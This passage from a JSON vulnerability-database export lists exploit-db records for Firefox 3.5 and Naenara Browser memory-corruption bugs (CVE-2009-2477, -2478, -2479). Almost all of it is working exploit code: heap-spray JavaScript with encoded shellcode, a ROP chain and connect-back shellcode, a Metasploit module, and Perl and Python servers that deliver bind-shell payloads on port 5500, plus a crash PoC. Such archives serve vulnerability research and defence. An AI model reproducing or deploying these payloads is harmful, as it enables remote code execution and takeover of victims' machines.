searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);\r\n if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\n \r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n# milw0rm.com [2009-07-13]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9137/"}, {"lastseen": "2016-12-19T09:58:38", "description": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution. CVE-2009-2477. Local exploit for Linux platform. Tags: Client Side", "published": "2016-12-18T00:00:00", "type": "exploitdb", "title": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2016-12-18T00:00:00", "id": "EDB-ID:40936", "href": "https://www.exploit-db.com/exploits/40936/", "sourceData": "<!-- \r\nDownload: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz\r\nMirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz\r\n-->\r\n\r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>\r\n<p>\r\n<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0MERCypDK </FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\nvar xunescape = unescape;\r\noneblock = xunescape(\"%u0040%u1000\");\r\nstackpivot = xunescape(\"%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141\");\r\nnopsled = xunescape(\"%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568\"); \r\n\r\nropgadget = xunescape(\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000\")\r\n\r\n<!-- connect back (\"192.168.0.10,80\") ffff = port, 01020304 = ipaddr \"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\" -->\r\n\r\nshellcode = xunescape(\"%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\");\r\n\r\n\r\nvar fullblock = oneblock; \r\nwhile (fullblock.length < 393216)\r\n{\r\n fullblock += fullblock;\r\n}\r\n\r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n\r\nfunction fill_function()\r\n{\r\n if(! sprayready) {\r\n for (xi=0; xi<800/100; xi++, sprayContainerIndex++)\r\n {\r\n sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;\r\n }\r\n } else {\r\n DataTranslator();\r\n GenerateHTML();\r\n }\r\n if(sprayContainer.length >= 1000) {\r\n sprayready = true;\r\n }\r\n}\r\n\r\nvar searchArray = new Array();\r\n\r\nfunction escapeData(data)\r\n{\r\n var xi;\r\n var xc;\r\n var escData='';\r\n for(xi=0; xi<data.length; xi++)\r\n {\r\n xc=data.charAt(xi);\r\n if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n escData+=xc;\r\n }\r\n return escData;\r\n}\r\n\r\nfunction DataTranslator()\r\n{\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"dac\"] = \"Kros\";\r\n var newElement = document.getElementById(\"content\");\r\n if (document.getElementsByTagName) {\r\n var xi=0;\r\n pTags = newElement.getElementsByTagName(\"p\");\r\n if (pTags.length > 0)\r\n while (xi < pTags.length)\r\n {\r\n oTags = pTags[xi].getElementsByTagName(\"font\");\r\n searchArray[xi+1] = new Array();\r\n if (oTags[0]) {\r\n searchArray[xi+1][\"dac\"] = oTags[0].innerHTML;\r\n }\r\n xi++;\r\n }\r\n }\r\n}\r\n\r\nfunction GenerateHTML()\r\n{\r\n var xhtml = \"\";\r\n for (xi=1;xi<searchArray.length;xi++)\r\n {\r\n xhtml += escapeData(searchArray[xi][\"dac\"]);\r\n }\r\n}\r\n\r\nsetInterval(\"fill_function()\", .5);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40936/"}, {"lastseen": "2016-02-01T23:32:48", "description": "Firefox 3.5 escape() Return Value Memory Corruption. CVE-2009-2477. Remote exploits for multiple platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Firefox 3.5 escape Return Value Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16299", "href": "https://www.exploit-db.com/exploits/16299/", "sourceData": "##\r\n# $Id: firefox_escape_retval.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::FF,\r\n\t\t:ua_minver => \"3.5\",\r\n\t\t:ua_maxver => \"3.5\",\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:javascript => true,\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:vuln_test => nil,\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Mozilla\r\n\t\t\t\tFirefox browser. This flaw occurs when a bug in the javascript interpreter\r\n\t\t\t\tfails to preserve the return value of the escape() function and results in\r\n\t\t\t\tuninitialized memory being used instead. This module has only been tested\r\n\t\t\t\ton Windows, but should work on other platforms as well with the current\r\n\t\t\t\ttargets.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit\r\n\t\t\t\t\t'hdm', # Metasploit conversion\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2009-2477'],\r\n\t\t\t\t\t['OSVDB', '55846'],\r\n\t\t\t\t\t['BID', '35660'],\r\n\t\t\t\t\t['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000 + (rand(256).to_i * 4),\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Firefox 3.5.0 on Windows XP SP0-SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x0c0c0c0c,\r\n\t\t\t\t\t\t\t'BlockLen' => 0x60000,\r\n\t\t\t\t\t\t\t'Containers' => 800,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x41414141,\r\n\t\t\t\t\t\t\t'BlockLen' => 496,\r\n\t\t\t\t\t\t\t'Containers' => 800000\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 14 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_html(payload)\r\n\r\n\t\tenc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\t\tenc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))\r\n\t\tenc_ret = Rex::Text.to_unescape(\r\n\t\t\tRex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N')\r\n\t\t)\r\n\r\n\t\tvar_data_str1 = Rex::Text.rand_text_alpha(3)\r\n\t\tvar_data_str2 = Rex::Text.rand_text_alpha(4)\r\n\t\tjs = <<-EOF\r\nvar xunescape = unescape;\r\nvar shellcode = xunescape(\"#{enc_code}\");\r\n\r\noneblock = xunescape(\"#{enc_ret}\");\r\n\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length < #{target['BlockLen']})\r\n{\r\n\tfullblock += fullblock;\r\n}\r\n\r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n\r\nfunction fill_function()\r\n{\r\n\tif(! sprayready) {\r\n\t\tfor (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)\r\n\t\t{\r\n\t\t\tsprayContainer[sprayContainerIndex] = fullblock + shellcode;\r\n\t\t}\r\n\t} else {\r\n\t\tDataTranslator();\r\n\t\tGenerateHTML();\r\n\t}\r\n\tif(sprayContainer.length >= #{target['Containers']}) {\r\n\t\tsprayready = true;\r\n\t}\r\n}\r\n\r\nvar searchArray = new Array();\r\n\r\nfunction escapeData(data)\r\n{\r\n\tvar xi;\r\n\tvar xc;\r\n\tvar escData='';\r\n\tfor(xi=0; xi<data.length; xi++)\r\n\t{\r\n\t\txc=data.charAt(xi);\r\n\t\tif(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n\t\t\tescData+=xc;\r\n\t}\r\n\treturn escData;\r\n}\r\n\r\nfunction DataTranslator()\r\n{\r\n\tsearchArray = new Array();\r\n\tsearchArray[0] = new Array();\r\n\tsearchArray[0][\"#{var_data_str1}\"] = \"#{var_data_str2}\";\r\n\tvar newElement = document.getElementById(\"content\");\r\n\tif (document.getElementsByTagName) {\r\n\t\tvar xi=0;\r\n\t\tpTags = newElement.getElementsByTagName(\"p\");\r\n\t\tif (pTags.length > 0)\r\n\t\t\twhile (xi < pTags.length)\r\n\t\t\t\t{\r\n\t\t\t\t\toTags = pTags[xi].getElementsByTagName(\"font\");\r\n\t\t\t\t\tsearchArray[xi+1] = new Array();\r\n\t\t\t\t\tif (oTags[0]) {\r\n\t\t\t\t\t\tsearchArray[xi+1][\"#{var_data_str1}\"] = oTags[0].innerHTML;\r\n\t\t\t\t\t}\r\n\t\t\t\t\txi++;\r\n\t\t\t\t}\r\n\t}\r\n}\r\n\r\nfunction GenerateHTML()\r\n{\r\n\tvar xhtml = \"\";\r\n\tfor (xi=1;xi<searchArray.length;xi++)\r\n\t{\r\n\t\txhtml += escapeData(searchArray[xi][\"#{var_data_str1}\"]);\r\n\t}\r\n}\r\n\r\nsetInterval(\"fill_function()\", .5);\r\nEOF\r\n\r\n\t\t# Obfuscate it up a bit\r\n\t\tjs = obfuscate_js(js, 'Symbols' => {\r\n\t\t\t'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function }\r\n\t\t}).to_s\r\n\r\n\t\tstr1 = Rex::Text.rand_text_alpha(20)\r\n\t\tstr2 = Rex::Text.rand_text_alpha(24)\r\n\t\tstr3 = Rex::Text.rand_text_alpha(10) + \" \"\r\n\r\n\t\treturn %Q^\r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>#{str1}</FONT></p>\r\n<p>\r\n<FONT>#{str2}</FONT>\r\n</p>\r\n<p>\r\n<FONT>#{str3}</FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\n#{js}\r\n</script>\r\n</body>\r\n</html>\r\n^\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16299/"}, {"lastseen": "2016-02-01T10:07:04", "description": "Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl). CVE-2009-2477. Remote exploit for windows platform", "published": "2009-07-20T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Heap Spray Exploit pl", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2009-07-20T00:00:00", "id": "EDB-ID:9214", "href": "https://www.exploit-db.com/exploits/9214/", "sourceData": "##################################################\r\n# FireFox 3.5 Heap Spray\r\n# Discovered by: Simon Berry-Bryne\r\n# Coded in Perl by netsoul, ALTO PARANA - Paraguay\r\n# Contact: netsoul2 [at] gmail [dot] com\r\n##################################################\r\n\r\n#!/usr/bin/perl -w\r\nuse strict;\r\nuse POE::Component::Server::HTTP;\r\nPOE::Component::Server::HTTP->new(Port => my $port = 8080,\r\nContentHandler => {\"/\" => sub{$_[1]->push_header(\"Content-Type\", \"text/html\"), $_[1]->content(<DATA>)}});\r\n\r\nprint \"[-] Listening in port $port...\\n[-] Sending payload...\\n[-] After 30 secs try with netcat for connect in port 5500\\n\";\r\nPOE::Kernel->run();\r\n\r\n__DATA__\r\n<html>\r\n<head>\r\n<title>Exploiting Firefox 3.5</title>\r\n<script language= javascript>\r\n//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai\r\nvar shellcode= unescape(\"%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef\" +\r\n\t\t\t\"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca\" +\r\n\t\t\t\"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01\" +\r\n\t\t\t\"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b\" +\r\n\t\t\t\"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff\" +\r\n\t\t\t\"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9\" +\r\n\t\t\t\"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189\" +\r\n\t\t\t\"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6\" +\r\n\t\t\t\"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779\" +\r\n\t\t\t\"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944\" +\r\n\t\t\t\"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16\" +\r\n\t\t\t\"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce\" +\r\n\t\t\t\"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0\" +\r\n\t\t\t\"%uff53%uffd6%u41d0\");\r\noneblock = unescape(\"%u0c0c%u0c0c\");\r\nvar fullblock = oneblock;\r\nwhile (fullblock.length<0x60000) \r\n{\r\n fullblock += fullblock;\r\n}\r\nsprayContainer = new Array();\r\nfor (i=0; i<600; i++) \r\n{\r\n sprayContainer[i] = fullblock + shellcode;\r\n}\r\nvar searchArray = new Array()\r\n \r\nfunction escapeData(data)\r\n{\r\n var i;\r\n var c;\r\n var escData='';\r\n for(i=0;i<data.length;i++)\r\n {\r\n c=data.charAt(i);$poe_kernel\r\n if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);\r\n escData+=c;\r\n }\r\n return escData;\r\n}\r\nfunction DataTranslator(){\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"str\"] = \"blah\";\r\n var newElement = document.getElementById(\"content\")\r\n if (document.getElementsByTagName) {\r\n var i=0;\r\n pTags = newElement.getElementsByTagName(\"p\")\r\n if (pTags.length > 0) \r\n while (i<pTags.length)\r\n {\r\n oTags = pTags[i].getElementsByTagName(\"font\")\r\n searchArray[i+1] = new Array()\r\n if (oTags[0]) \r\n {\r\n searchArray[i+1][\"str\"] = oTags[0].innerHTML;\r\n }\r\n i++\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var html = \"\";\r\n for (i=1;i<searchArray.length;i++)\r\n {\r\n html += escapeData(searchArray[i][\"str\"])\r\n } \r\n}\r\nDataTranslator();\r\nGenerateHTML()\r\n</script>\r\n</body>\r\n</html>\r\n\r\n# milw0rm.com [2009-07-20]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9214/"}, {"lastseen": "2016-02-01T09:59:52", "description": "Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC. CVE-2009-2479. Dos exploit for windows platform", "published": "2009-07-15T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2479"], "modified": "2009-07-15T00:00:00", "id": "EDB-ID:9158", "href": "https://www.exploit-db.com/exploits/9158/", "sourceData": "------------------------------------------->\r\nFirefox 3.5 unicode stack overflow\r\n\r\nAndrew Haynes , Simon Berry-Byrne\r\n\r\n\r\n------------------------------------------->\r\n\r\n\r\n<html>\r\n<head>\r\n<script language=\"JavaScript\" type=\"Text/Javascript\">\r\n\tvar str = unescape(\"%u4141%u4141\");\r\n\tvar str2 = unescape(\"%u0000%u0000\");\r\n\tvar finalstr2 = mul8(str2, 49000000);\r\n\tvar finalstr = mul8(str, 21000000);\r\n\r\n\r\ndocument.write(finalstr2); \r\ndocument.write(finalstr); \r\n\r\nfunction mul8 (str, num) {\r\n\tvar\ti = Math.ceil(Math.log(num) / Math.LN2),\r\n\t\tres = str;\r\n\tdo {\r\n\t\tres += res;\r\n\t} while (0 < --i);\r\n\treturn res.slice(0, str.length * num);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\r\n\r\n# milw0rm.com [2009-07-15]\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9158/"}, {"lastseen": "2016-02-01T10:03:12", "description": "Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit. CVE-2009-2478. Remote exploit for windows platform", "published": "2009-07-17T00:00:00", "type": "exploitdb", "title": "Mozilla Firefox 3.5 Font tags Remote Heap Spray Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2478"], "modified": "2009-07-17T00:00:00", "id": "EDB-ID:9181", "href": "https://www.exploit-db.com/exploits/9181/", "sourceData": "#!/usr/bin/env python\r\n#######################################################\r\n#\r\n# FireFox 3.5 Heap Spray Exploit\r\n# Originally discovered by: Simon Berry-Bryne\r\n# Pythonized by: David Kennedy (ReL1K) @ SecureState\r\n#\r\n#######################################################\r\nfrom BaseHTTPServer import HTTPServer \r\nfrom BaseHTTPServer import BaseHTTPRequestHandler \r\nimport sys \r\n\r\nclass myRequestHandler(BaseHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n self.printCustomHTTPResponse(200)\r\n if self.path == \"/\":\r\n target=self.client_address[0]\r\n self.wfile.write(\"\"\"\r\n<html>\r\n<head>\r\n<title>Firefox 3.5 Vulnerability</title>\r\nFirefox 3.5 Heap Spray Exploit\r\n</br>\r\nDiscovered by: SBerry aka Simon Berry-Byrne\r\nPythonized: David Kennedy (ReL1K) at SecureState\r\nBind Shell Port: 5500\r\nEncoding: Shikata_Ga_Nai\r\n</br>\r\n<div id=\"content\">\r\n<p>\r\n<FONT> \r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>Ihazacrashihazacrash</FONT></p>\r\n<p>\r\n<FONT>Ohnoesihazacrashhazcrash</FONT>\r\n</p>\r\n<p>\r\n<FONT>Aaaaahhhhh </FONT>\r\n</p>\r\n</div>\r\n<script language=JavaScript>\r\n\r\n// windows/shell_bind_tcp - 317 bytes http://www.metasploit.com LPORT=5500 encoding=shikata_ga_nai\r\nvar shellcode= unescape(\"%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef\" +\r\n\t\t\t\"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca\" 